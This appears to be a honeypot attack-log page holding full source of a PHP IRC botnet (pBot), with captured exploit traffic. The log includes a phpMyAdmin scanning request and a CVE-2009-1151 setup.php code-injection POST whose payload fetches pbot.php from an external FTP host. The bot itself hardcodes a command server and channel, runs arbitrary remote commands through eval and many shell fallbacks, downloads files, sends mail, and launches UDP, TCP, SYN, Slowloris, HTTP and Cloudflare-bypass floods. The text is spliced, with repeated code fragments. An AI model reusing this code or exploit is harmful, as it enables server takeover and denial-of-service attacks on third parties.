$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atacul a fost initiat!");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atac terminat cu succes: 12" . $env . " MB trimisi / Medie: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2#TKH -> !\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
phpMyAdmin scanner
[Attack info]
Attacker:
106.12.112.59
Dest. port: 80
Time: 17/02/2019 02:05:06
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd.
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.
CVE
N/A
Author
Unknown
Reference
N/A
Plugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5
GET /phpmyadmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Resource ( 1 / 0 )
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:51:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE
CVE-2009-1151
Author
Adrian "pagvac" Pastor
Plugin ID
oosheefee1baixeinief5nociu5shohh
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
